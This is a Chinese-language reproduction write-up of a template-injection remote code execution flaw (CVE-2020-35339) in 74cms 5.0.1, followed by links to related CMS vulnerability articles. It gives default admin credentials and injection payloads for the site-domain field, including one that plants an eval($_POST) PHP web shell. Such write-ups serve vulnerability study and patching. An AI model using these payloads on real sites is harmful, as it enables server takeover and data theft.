骑士cms任意代码执行

漏洞描述：

迅易科技 74cms是中国迅易科技公司的一套基于PHP和MySQL的在线招聘系统。

74cms version 5.0.1 存在安全漏洞，该漏洞源于应用管理控制器ConfigController.class.php和ThinkPHP Common functions.php存在远程代码执行漏洞，攻击者可利用该漏洞可以获得服务器权限并控制服务器。

漏洞利用条件:

/Application/Common/Controller/BaseController.class.php文件的assign_resume_tpl函数因为过滤不严格，导致了模板注入，可以进行远程代码执行

漏洞影响范围：

74cms version 5.0.1

漏洞复现：

/index.php?m=Admin 访问后台，adminadmin/adminadmin登录后台:

2.在网站域名中填写/.',phpinfo(),'/.com然后保存，刷新当前页面，返回phpinfo页面：

3.Getshell：在网站域名输入/.',eval($_POST[a]),'/.com，保存刷新：

4.连接木马：

修复建议：

1.关注厂商，升级版本

骑士cms任意代码执行相关推荐

骑士cms任意代码执行（CVE-2020-35339）
本文章仅供学习使用,如用作非法用途,概不负责 0x01 漏洞介绍骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统.由太原迅易科技有限公司于2009年正式推出.为 ...
vulfocus——骑士cms任意代码执行(CVE-2020-35339）
描述骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统. 后台账号密码均为adminadmin 复现 1.打开web页面 2.找到后台登陆界面 ip:port/i ...
记一次海洋cms任意代码执行漏洞拿shell(url一句话)
实验环境:海洋CMS6.54(后续版本已该洞已补) 1.后台登录尝试这个站点是个测试站,站里没什么数据. 进入admin.php,是带验证码的后台登录系统,没有验证码的可以用bp爆破.有验证码的也有 ...
php里pluck,Pluck CMS后台另两处任意代码执行
前言本来是在cnvd上看到了有人发Pluck CMS的洞,但是没有公开细节,便想着自己挖一下. 但是审完第一个后发现已经有两位同学写出来了当时自己的思路跟第一个同学一样,第二个同学的思路自己确实没 ...
74cms 任意代码执行（CVE-2020-35339）
74cms 任意代码执行(CVE-2020-35339) 0x01 漏洞简介骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统.由太原迅易科技有限公司于2009年 ...
php 168任意代码执行漏洞之php的Complex (curly) syntax
今天了解了php 168的任意代码执行漏洞,Poc: http://192.168.6.128/pentest/cms/php168/member/post.php ?only=1 &show ...
Android Adobe Reader 任意代码执行分析(附POC)
livers · 2014/04/18 14:05 0x00 描述前几天老外在fd还有exploit-db上,公布了Adobe Reader任意代码执行的漏洞. 漏洞编号: CVE: 2014-05 ...
ecshop 2.x/3.x sql注入/任意代码执行漏洞
影响版本: Ecshop 2.x Ecshop 3.x-3.6.0 漏洞分析: 该漏洞影响ECShop 2.x和3.x版本,是一个典型的"二次漏洞",通过user.php文件中di ...
nginx php 配置请求等待时间_CVE-2019-11043: PHP-FPM在Nginx特定配置下任意代码执行漏洞预警...
0x01 前言 2019年10月23日,PHP官方发布了在 nginx 配置不当的情况下 php-fpm 可导致远程代码执行的漏洞. 但由于是配置文件的开放性,还请使用 nginx+php-fpm 的 ...

骑士cms任意代码执行

骑士cms任意代码执行相关推荐

最新文章

热门文章